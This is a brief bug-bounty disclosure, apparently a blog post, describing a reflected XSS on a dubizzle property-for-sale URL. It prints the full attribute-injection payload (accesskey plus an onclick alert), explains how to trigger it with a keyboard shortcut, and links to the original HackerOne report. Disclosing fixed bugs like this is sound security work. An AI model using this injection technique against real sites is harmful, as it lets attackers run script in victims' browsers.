Step to Reproduce
https://sharjah.dubizzle.com/property-for-sale/land" accesskey="X" onclick=alert(1337) codelatte="/2018/10/10/commercial-land-for-sale-in-al-sajja-12/(you can copy and paste).
- XSS is reflected inside HTML Link tag
ALT + SHIFT + Xin keyboard to trigger XSS payload.
- Alert will showing up.
After the bug was fixed, my name entered on the Security Hall of Fame 😎
https://hackerone.com/reports/504984 (Original Report).
https://portswigger.net/blog/xss-in-hidden-input-fields (XSS in hidden input fields).
PS: Sorry, maybe there are some irreverent words. It’s semi-google-translate. Hopefully you understand that xD